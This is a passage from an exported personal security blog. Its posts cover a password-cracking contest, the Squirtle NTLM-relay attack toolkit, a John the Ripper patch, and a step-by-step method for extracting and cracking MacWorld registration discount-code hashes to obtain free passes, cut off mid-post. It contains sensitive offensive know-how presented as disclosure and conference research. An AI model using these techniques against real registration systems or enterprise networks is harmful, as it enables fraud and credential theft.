The top 4 teams:<br />
<pre>74766 8D65BF65887D65A9 Hashcat
50155 CCDE2FAB9599C0A6 Insidepro team 2011
45187 7D47E99A316E29D7 john-users
24687 889DCCAD7B08FD12 bindshell-dot-nl</pre><br />
Where am I in all of this?<br />
<pre>4447 EC952A038CB3ECB4</pre><br />
That's about what I expected. I'm only one person with a small spattering of machines at my disposal. With 121,614 hashes to crack of 20 different hash types you have to be smart. Brute force will only get you so far and so far that's mostly what I've been doing: finding the commonality amongst the easy-to-crack so, time permitting, the bigger scoring hashes can be cracked.<br />
<br />
<br />
Honestly I only have a few hours of free time left so I'll probably pick a few high scoring hash types and let the permutation of the wordlist run for a bit.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-88100061354021812062011-08-05T08:45:00.000-07:002011-08-05T08:45:03.848-07:00KoreLogic 2011 Crack Me If You CanDue to a lot of family-type things happening around the BlackHat/Defcon/CCC dates I have been unable to attend. Usually it's work that precludes the "having fun in 120 degree Las Vegas weather."<br />
<br />
Thankfully KoreLogic has given non-attendees the chance to play in their "<a href="https://contest.korelogic.com/">Crack Me If You Can</a>" game for Defcon! Hooray! 48 hours of unadulterated power consuming, hash generating, text file management, pgp encrypting and general usage of unused computing cycles!<br />
<br />
This year I decided to devote a few hours to this contest while the wife and baby sleep. I'll be writing some updates as I get some time on how things are going. It's now been a little over an hour since I started so here's where things stand.<br />
<br />
<b><u>On Your Mark</u></b><br />
Pre-registration involved generating a PGP key (if you didn't already have one) and sending it off to KoreLogic's scoring server for verification. This was easy if you've spent any time doing encrypted communication exchanges.<br />
<br />
<b><u>Get Set</u></b><br />
While I waited for the contest to start I made sure I had all my tools and systems ready. This would be the chance to help prove out the expenditure of NVidia GTX580 cards, high-end CPUs, RAID disk space, etc. Since I'm running in an even shorter timeframe (and smaller team size... of one!) early preparation was key.<br />
<br />
Tools I planned on using:<br />
<br />
<ul><li><a href="http://openwall.com/john/">John the Ripper</a>, latest jumbo patches and GPU patches if time and code permitted</li>
<li>The <a href="http://hashcat.net/">oclHashCat</a> suite</li>
<li>Misc rainbowtables collected over the years</li>
<li>Misc wordlists collected over the years</li>
</ul><div><b><u>GO!</u></b></div><div>Molly wakes me up at 5:50am on Friday morning for her regular feeding... 20 minutes of extra sleep! I check my e-mail and am excited to see the encrypted contest e-mails in my inbox. A quick pgp decryption and the URLs to download are shown. Hooray!</div><div><br />
</div><div>Oops, based on the CMIYC twitter feed they had generated some weak hashes. Use the two files instead of the first one. Ok!</div><div><br />
</div><div>Down they come with wget.... Hmm, zip files. No problem! Take a peek with 'unzip -v' and the contents look pretty good. Time to get rolling...</div><blockquote><blockquote>~/korelogic-2011/test$ unzip ../2011-CrackMeIfYouCan_part1.zip </blockquote></blockquote><blockquote><blockquote>Archive: ../2011-CrackMeIfYouCan_part1.zip</blockquote><blockquote> creating: contest_tree/challenge1/</blockquote><blockquote>[../2011-CrackMeIfYouCan_part1.zip] contest_tree/challenge1/challenge1.zip password: </blockquote></blockquote>Oh. Of course it's going to be password protected. But it's pretty easy to guess if you take a step back and think about it.<br />
<br />
<b><u>Two hours in...</u></b><br />
<blockquote><blockquote>4066 password hashes cracked, 123780 left</blockquote></blockquote>A long way to go still... Right now I'm basically not caring about the scoring points and going after "low-hanging passwords" using a very large dictionary, JTR's stock rules and patience. Some high scoring hashes may be cracking, I don't really know right now.. Time to feed the baby again.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-59486032663329925002009-02-12T11:08:00.001-08:002009-02-12T11:13:24.858-08:00Where's grutz?I've been very busy with a number of things and haven't been able to focus on fun things to share. Work work work work work! This year MacWorld did finally manage to fix their issue so no free platinum passes using the same, tired exploit! <a href="http://code.google.com/p/squirtle/">Squirtle</a> has been put on the backburner for now and valentines day is right around the corner. Too bad I'm not Cupid... and I'm filled with hatred and rage!<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/J4UOiHu3RMU&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/J4UOiHu3RMU&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br />Here's to hoping your 2009 is a great one. Happy Chinese New Year!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-41479495429244197612008-11-15T13:42:00.000-08:002008-11-15T13:57:30.311-08:00Squirtle and MS08-068HD Moore already did some <a href="http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html">great analysis</a> on how the MS08-068 patch affected the SMB Relay attacks within Metasploit. The answer?<br /><br />You can't attack the source workstation/server if MS08-068 has been applied.<br /><br />This ONLY affects Squirtle if your evil agent attempts to communicate back to the victim. It should not impact attacking their IMAP, HTTP or File/Print servers.<br /><br />As always the goal of Squirtle is to permit others to extend their own tools to permit the use of authentication requests from controlled browsers and at your own time or when the right users click on your evil link!<br /><br />Have fun with the latest updates and thanks to Natron for pointing me towards HD's analysis.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-32745385523982765752008-11-14T09:38:00.001-08:002008-11-14T10:11:42.324-08:00Squirtle Updates: IMAP, Metasploit integration completeI just gave a talk to everyone here at <a href="https://www.deepsec.net/">DeepSec 08</a>. Other than the weather being a bit cold and wet Vienna is awesome. Everyone seems happy to be at this conference and to share and network with each other. It's always fun giving the Squirtle talk to new audiences and see their eyes light up as they start to get why this attack matters to their environments or how they could use it on a client's penetration test.<br /><br />With the conclusion of this talk I'm happy to announce that two new evil agent updates have been completed!<br /><ul><li>IMAP Mirroring! Download a victim's entire IMAP directory! Use social engineering, have the help desk e-mail them a new password!<br /><li>Metasploit integration! SMB Relay an enterprise's server farm with Squirtle!<br /></ul>Get the latest updates from the Squirtle SVN at <a href="http://squirtle.googlecode.com/">http://squirtle.googlecode.com/</a>. The MSF update is a patch against the as-of-writing-this MSF 3.2-current SVN code. If things change I'll try to keep it updated. Not sure if this is "MSF-code worthy" as it uses the JSON ruby gem vs processing the result manually. I had the library installed, didn't want to write my own parser. :P<br /><br />On Nov 11th MSRC <a href="http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-smbrelay.aspx">posted</a> some information on MS08-068 implementing some changes to the NTLM protocol to neuter the SMB Relay attack and possibly (but not mentioned) Squirtle as well. I haven't had a chance to play with yet as I didn't want to possibly spoil the live demos so close to DeepSec. It's nearly time to spend the evening at <a href="http://www.metalab.at/">Metalab</a> so more information as it develops (I promise!)<br /><br />Big thanks to everyone here at DeepSec for coordinating this one-of-kind conference. Vienna is such a beautiful place to visit, I only wish it would be earlier in the season when it's not so cold and dreary outside. I hope to come next year for DeepSec 09!<br /><br />Also, look for my ugly mug to make an appearance on <a href="http://www.net-security.org/">Help Net Security</a> soon. It's a brief plea on using Squirtle and hopefully my excitement over reaching more people isn't too transparent. :)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com5tag:blogger.com,1999:blog-28687371.post-27200752856960389542008-09-02T15:24:00.000-07:002008-09-02T15:40:02.922-07:00Upcoming Speaking GigsTying a neat little bow to my NTLM/HTTP research I'll be presenting "One XSS to Rule The Enterprise" at <a href="http://sandiego.toorcon.org/">ToorCon X</a> the end of September and "NTLM SSO Weaknesses" at <a href="https://deepsec.net/">DeepSec</a> in November. Both talks will show off the <a href="http://code.google.com/p/squirtle">Squirtle Attack Toolkit</a>. Hopefully I'll have some of the updates I didn't get into the DefCon release ready by ToorCon!<br /><br />When friends ask "should I go to Defcon?" I always respond "Hey, check out ToorCon. It's in a nicer climate!" Vegas in July? Pfft, San Diego in September! One of the best conventions out there, period. Just check out the <a href="http://sandiego.toorcon.org/content/section/3/9/">conference lineup</a>!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-3746266630890564422008-08-12T15:51:00.000-07:002008-08-12T16:09:41.653-07:00Passing The Dutchie @ Defcon 16Like many things with this blog, I don't prioritize it above things like hanging out with my girlfriend, going to work, sleeping, breaking my iPhone, losing all my Defcon pictures, etc.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/images/That_evil_Squirtle.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://grutz.jingojango.net/images/That_evil_Squirtle.png" border="0" alt="" /></a>Last weekend was Defcon 16. I had a really great time speaking to a packed house on the death of NTLM. <a href="http://grutz.jingojango.net/presentations/NTLM%20is%20Dead%20-%20DefCon%2016.pdf">Slides</a>, <a href="http://grutz.jingojango.net/presentations/NTLM%20is%20Dead%20-%20DefCon%2016.mov">slide video</a> and <a href="http://code.google.com/p/squirtle">source code to Squirtle</a> are now available for your pleasure. I'll be doing some more work and documentation on Squirtle shortly.<br /><br />A few quick changes were made to the slide deck from what was presented (and the slides on the CD are waaaaaay something different :). Mostly added NTLM Signing as a mitigation and correctly stating that JoMoKun did the Samba Pass-The-Hash modifications. Sorry!<br /><br />More updates coming.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-76206485691864633812008-08-07T08:08:00.000-07:002008-08-07T08:17:31.997-07:00NTLM is Dead: Defcon 16<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhInlngoF_DxfOnIPldR0b0cu_cjBm_pVBY4al3m_TKDJehHS9yywN-JrjRuaAszVkWzcf0jNYUGqDT0BVfbjd0MTSSR5wkLqyRjZGIUvBUBgT5exfcALsw9wtxPo3izS52tUJslw/s1600-h/NTLM_title.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhInlngoF_DxfOnIPldR0b0cu_cjBm_pVBY4al3m_TKDJehHS9yywN-JrjRuaAszVkWzcf0jNYUGqDT0BVfbjd0MTSSR5wkLqyRjZGIUvBUBgT5exfcALsw9wtxPo3izS52tUJslw/s400/NTLM_title.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5231794561207673986" /></a><br />Friday, August 8th @ 2pm. Come learn how to own an enterprise with one XSS!<br /><br /><a href="http://grutz.jingojango.net/exploits/squirtle/">Slides</a> and other material will be on-line after Defcon. Source code available <a href="http://code.google.com/p/squirtle/">here</a><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-8694233198762001942008-07-30T20:02:00.000-07:002008-07-30T21:04:44.758-07:00Attacking NTLMDefcon presentation times have been confirmed for a few weeks now and I've been slaving away at my slides and source code for a while now. I gave a pre-talk at work the other day and have decided to redo a lot of the slides. That's what you get when you ask for slides 38 days before the presentation. :)<br /><br />Of course I'll have the full slides on-line after the conference but if you're coming to Defcon please come to my talk: Friday, August 8th at 2pm.<br /><br />What exactly will I be talking about? Well, it's really difficult to describe succinctly but the best way I can say it is: An XSS inside your company == Total Domain Ownage.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/images/ntlm2.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://grutz.jingojango.net/images/ntlm2.jpg" border="0" alt="" /></a><br /><br />Was that a scoff I just heard under your breath? Honestly, I'm not lying here. Because of the way NTLM and Windows Single Sign-On works your run-of-the-mill cross site scripting error on an internal resource can DEVASTATE your enterprise!<br /><br />Stay tuned.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com2tag:blogger.com,1999:blog-28687371.post-57203158941237659492008-06-13T15:44:00.000-07:002008-06-13T16:52:39.841-07:00MS Cache and John the RipperChalk this one up to knowledge remembered, forgotten, and then remembered again!<br /><br />Lately I have been playing with using our MPI John the Ripper cluster to increase the crack rate of MS Cache passwords. With a very long list of passwords, some of which I knew would be easy to crack, I set out and started the process on 20 nodes. After a few days and ZERO cracks I started to wonder what the hell was going on.<br /><br />The answer is one I knew many years ago when <a href="http://www.securiteam.com/tools/5JP0I2KFPA.html">cachedump</a> first came on the scene. The MS Cache encryption routine's salt includes the <b>lower case username</b> as part of the salt! Because some of the cachedump tools take the username out of the registry as-is and don't convert the case you'll run JTR for days with an invalid salt. No cracks for you!<br /><br />So we can do a couple of things here:<br /><ul><li>Remember this next time and manually lowercase the usernames</li><br /><li>Tell the authors to modify the tools we use to grab the cache hashes</li><br /><li>Patch the tools ourselves (if we have the sources) and give them to the author</li><br /><li>Modify the cracking program to always lowercase the usernames<br /></li></ul><br />John The Ripper's source code is really easy to fix and the quickest to do so a simple diff against mscash_fmt.c:<br /><pre><br />--- mscash_fmt.c 2008-06-13 15:56:07.000000000 -0700<br />+++ mscash_fmt-lower.c 2008-06-13 15:55:49.000000000 -0700<br />@@ -16,6 +16,7 @@<br /> */<br /> <br /> #include <string.h><br />+#include <ctype.h><br /> <br /> #include "arch.h"<br /> #include "misc.h"<br />@@ -158,6 +159,9 @@<br /> <br /> l = strlen(ciphertext);<br /> strncpy(out, ciphertext + 2, l - PLAINTEXT_LENGTH + 1);<br />+ for(l=0; l < strlen(out); l++) {<br />+ out[l] = tolower(out[l]);<br />+ }<br /> return out;<br /> }<br /></pre><br /><br />And now I don't have to remember this every time! JTR will remember for me and with a cluster of 20 nodes all running around 600,000 cracks a second maybe SOMETHING will crack. :)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-79177291860274123872008-06-06T00:39:00.000-07:002008-06-06T01:02:46.696-07:00NTLM, DefCon and Java!John Heasman just <a href="http://heasman.blogspot.com/2008/06/stealing-password-hashes-with-java-and.html">posted a rocking method</a> of obtaining NTLM hashes out of an enterprise by turning a Java applet into a web server! Check it out!<br /><br />This year I'll be <a href="http://www.defcon.org/html/defcon-16/dc-16-speakers.html#Grutzmacher">presenting at DefCon</a> on the history of NTLM attacks, how they work and why we need to get rid of it. I'll release a tool that will combine as many hacks as I can get working to use captured users and their authentication tokens. There's been a lot of talk in the past few years about browser security and it's mostly hinged around using Javascript as a port scanner, sending attacks through the browser, attacking the platforms, etc. Few have been talking about an Enterprise-class risk and since that's what I get paid to think about I'm gonna blow it open. :) Come to DefCon and have a great time!<br /><br /><a href="http://www.syscan.org/">SyScan</a> was great, a little small but helpful to bring the confidence up speaking to people who have no clue who I am! I learned quite a bit about my speaking style which helped firm up ideas about the DefCon presentation. I presented a combination of Web Security Mistakes including how to get a <a href="http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.html">free MacWorld pass</a> and spoke more about the future of <a href="http://grutz.jingojango.net/exploits/pokehashball.html">PokeHashBall</a>. <br /><br />We stayed a few extra days to soak up the culture and soak the sweat into our clothes some more since this was our first trip to Hong Kong. The <a href="http://www.12hk.com/area/Mongkok/MongkokComputerCentre.shtml">MongKok Computer Center</a> was interesting but didn't seem to really have the deals I was expecting. I didn't get to any of the other computer centers however. Maybe next trip!<br /><br />We went through Narita airport on the way back so I stopped at Duty Free and bought a bottle of Suntory Whiskey, the kind Bill Murray is hawking in the movie "Lost In Translation". For relaxing times, make it Santory time. . .<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/RdZt4BMfY3Q&hl=en"></param><embed src="http://www.youtube.com/v/RdZt4BMfY3Q&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object><br /><br />They have some of the greatest commercials.<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/YotCl8xcRtk&hl=en"></param><embed src="http://www.youtube.com/v/YotCl8xcRtk&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-52328821456679034922008-05-26T16:14:00.000-07:002008-05-26T16:24:48.401-07:00Heading to SyScan Hong Kong<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.jaunted.com/files/admin/Hong_Kong_Golden_Toilet.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px;" src="http://www.jaunted.com/files/admin/Hong_Kong_Golden_Toilet.jpg" border="0" alt="" /></a><br /><br />I've been given the opportunity to talk about Web Security at this year's <a href="http://www.syscan.org/">SyScan conference</a> in Hong Kong. This is my first trip to Asia so I'm really really excited about it! I haven't traveled much outside of North America -- the trip to Chaos Camp was my first oceanic flight. The Pacific Ocean is so huge that our flight from SFO will total 17 hours! It was only 9 hours to Dusseldorf!<br /><br />This talk will expand on my OWASP talk on trusting the client and the <a href="http://grutztopia.jingojango.net/2008/01/another-free-macworld-platinum-pass-yes.html">MacWorld Pass hack</a>. I'll also give a brief bit on <a href="http://grutz.jingojango.net/exploits/pokehashball.html">NTLM Single Signon (NTLMSSP) attacks</a>. Looking forward and will update at the con!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-28196076949954132552008-02-22T14:54:00.001-08:002008-02-22T15:20:04.892-08:00Your Client-Side Security SucksLast night I presented at the local OWASP chapter titled "Your Client-Side Security Sucks: STOP USING IT (as your only method of security)" and the turn-out was great. I met some really awesome people and the subject matter, while not cutting-edge research, appeared to hit home.<br /><br />We, as Web Application people, are still making some simple mistakes. This presentation highlighted three REAL WORLD examples of client-side security done incorrectly.<br /><br />The PDF slides are available <a href="http://grutz.jingojango.net/presentations/Your%20Client%20Security%20Sucks%20-%20OWASP.pdf">here</a> and soon I'll have a QuickTime video with a voiceover. I LOOOOOVE Keynote now! It has such useless transformations that you must pull back or else the content will be lost. How awesome is that? Plus exporting to a QuickTime so others can enjoy your ego-boosting flame build-in!<br /><br />Rumor has it there will be an OWASP regional conference in the near future so hopefully I'll present this again with some improved slides and other real world examples. If you have any examples but don't want to "go public" yourself, let me know and I'll share them. This is one of the first things you're supposed to learn as a web developer so I have no problem exposing others. JavaScript, Java and Flash do not equate to protection! Shoot me an e-mail.<br /><br />The second presenter, as luck would have it, is working on a tool exactly like I had done for NTLM relay attacks! We had a good chat about where we both saw our tools going in the future. It has renewed my energy in completing the <a href="http://grutz.jingojango.net/exploits/pokehashball.html">PokeHashBall tools</a><br />at least. Thanks, eric!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-72606767970859447612008-01-24T11:33:00.000-08:002008-01-24T11:38:10.108-08:00I Like Apple Products But I Am Not A MacHeadSome have asked that because I've pick on MacWorld am I a <a href="http://www.macheadthemovie.com/">MacHead</a>? The answer is no, but I do like Apple products. This will be a fun movie to see as there certainly is a cult of Mac, especially here in the Bay Area.<br /><br /><div><object width="420" height="352"><param name="movie" value="http://www.dailymotion.com/swf/x44l1c"></param><param name="allowFullScreen" value="true"></param><param name="allowScriptAccess" value="always"></param><embed src="http://www.dailymotion.com/swf/x44l1c" type="application/x-shockwave-flash" width="420" height="352" allowFullScreen="true" allowScriptAccess="always"></embed></object><br /><b><a href="http://www.dailymotion.com/video/x44l1c_macheads-the-movie-trailer_tech">Macheads - the movie (trailer)</a></b><br /><i>Uploaded by <a href="http://www.dailymotion.com/brunogarattoni">brunogarattoni</a></i></div><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-39783963172290427642008-01-14T23:06:00.001-08:002008-01-15T10:59:21.705-08:00Another Free MacWorld Platinum Pass? Yes in 2008!<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBNB3lwKCGYh2QJzjDXjEmXGw_nlKTKUrzYtFHocxn52Lm_iuSqP7jDbN6aHCKbZtPddyjmaYGYS5Fe35XncDRxp2hVEgzKQhw88yeW7qj6m50ZFDIFFreR-ROqdrLgW1Uc0LKQ/s1600-h/MacWorld2K8-badge.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBNB3lwKCGYh2QJzjDXjEmXGw_nlKTKUrzYtFHocxn52Lm_iuSqP7jDbN6aHCKbZtPddyjmaYGYS5Fe35XncDRxp2hVEgzKQhw88yeW7qj6m50ZFDIFFreR-ROqdrLgW1Uc0LKQ/s400/MacWorld2K8-badge.jpg" alt="" id="BLOGGER_PHOTO_ID_5155755059724095938" border="0" /></a><br />Last year at this time I <a href="http://grutztopia.jingojango.net/2007/01/your-free-macworld-expo-platinum-pass_11.html">disclosed an issue with the IDG/MacWorld Expo registration</a> that allowed people Free Platinum Passes (valued at $1,695). I communicated this issue with IDG the week of MacWorld and they removed all the codes, fixed the site, and said thanks. Questions were asked on how to write better code and I gave them a few tips (don't trust user input, don't give your secret codes to everyone, encryption is not one-way, etc). Did they listen?<br /><br />Nope.<br /><br /><insert badge="" picture=""><span style="font-style: italic;"><span style="font-weight: bold;">Why Do I Do This?</span></span><br /><br />Who wants to stand in line to see the Steve Jobs keynote at MacWorld? I mean have you SEEN the lines there? Really? I want to know WHATS IN THE AIR(tm)!!!<br /><br />Honestly it's academic to me. I didn't even go to the keynote. :P<br /><br /><span style="font-style: italic; font-weight: bold;">Getting Your Golden (Well, Blue) Ticket:</span><br /><br />This year the cost of Platinum Passes has gone up to $1,895. That's a lot of money but you get a <a href="http://www.macworldexpo.com/about/packages_pricing">lot of cool things</a>:<br /></insert><ul><li>A free lunch every day</li><li>Free ticket to the MacWorld Blast</li><li>Seminars (MacWorld is more than just the keynote and Expo)<br /></li><li>Priority Access Line to the Keynote</li></ul><insert badge="" picture="">You can see why the cost. Last year the word "CREDIT" provided a 100% discount on checkout. These are called <a href="http://jeremiahgrossman.blogspot.com/2007/09/business-logic-flaws-freshly-minted.html">Application Logic Flaws</a> and aren't new attacks but they can be <a href="http://jeremiahgrossman.blogspot.com/2007/11/qvc-business-logic-flaw-nets-scammer.html">devastating</a> .<br /><br />Like last year IDG is passing a long list of MD5 hashes to the client browser and validating them in JavaScript before sending a request to the server -- but that's really only a problem if the codes that give the discounts exist and are easily cracked. Lets see if we can get lucky this year.<br /><br /><span style="font-weight: bold; font-style: italic;">Obtaining the codes -- Same as last year:</span><br /><br />Step 1. Navigate to the <a href="http://www.macworldexpo.com/registration/">main registration page</a><a href="http://www.macworldexpo.com/registration/"></a><br />Step 2. Submit your initial data and view the source of the main registration page, search for "Priority Code"<br />Step 3. See the JavaScript "onchange" function? It's calling "check_password()"<br />Step 4. Search for "check_password()" and you'll find the list of valid codes in MD5<br />Step 5. Format the data for your cracker of choice and start cracking!<br /><br /><span style="font-weight: bold; font-style: italic;">Cracking the codes:</span><br /><br />I like <a href="http://www.openwall.com/john/">John The Ripper</a> for all my hash cracking needs. It's flexible, easy to use and affordable! There are two main methods used to crack passwords in John, using a wordlist or incrementing through a given keyspace. I always begin with a wordlist run just to kick out the quickies. The hash for "NONE" breaks but we already know that doesn't do anything for us.<br /><br />Incremental mode is our next step but we know lower case letters aren't used so a quick look at the configuration file shows an external mode "Filter_LanMan" that throws everything to upper case. A quick run through doesn't net any cracked hashes unfortunately. There are still over 1,000 hashes to crack so we have to be a bit more intelligent in our cracking (or throw more machines, wait longer, get a PS3, etc).<br /><br /><span style="font-weight: bold; font-style: italic;">A Brief Cracking Sidebar:</span><br /><br />Incremental cracking can take a long time to perform. The size of your keyspace (<span style="font-style: italic;">k</span>) and the maximum word length (<span style="font-style: italic;">l</span>) determine the total number of permutations that have to be encrypted to check every instance (<span style="font-style: italic;">P</span>). <span style="font-style: italic;">P=k^l</span>. Take the benchmark cracks-per-second your machine takes (<span style="font-style: italic;">Cs</span>), do the math (<span style="font-style: italic;">P/Cs</span>) and you have the number of seconds it takes to run an Incremental.<br /><br />For example lets make <span style="font-style: italic;">k</span> = 69, <span style="font-style: italic;">l</span> = 8 and <span style="font-style: italic;">Cs</span> = 30 million:<br /></insert><blockquote face="courier new"> ((69^8)/30M) / 60 = 285,443.54 minutes (3.68 months!)<br /></blockquote>Changing <span style="font-style: italic;">l</span> for different lengths and the time changes accordingly:<br /><blockquote face="courier new"> ((69^7)/30M) / 60 = 4,136.86 minutes for 7 chars<br />((69^6)/30M) / 60 = 59.95 minutes for 6 chars</blockquote>and so on. . . The time is cumulative and those are just my numbers. Some have found ways to increase the speed to <a href="http://www.google.com/search?q=nick+breese+ps3">1 billion 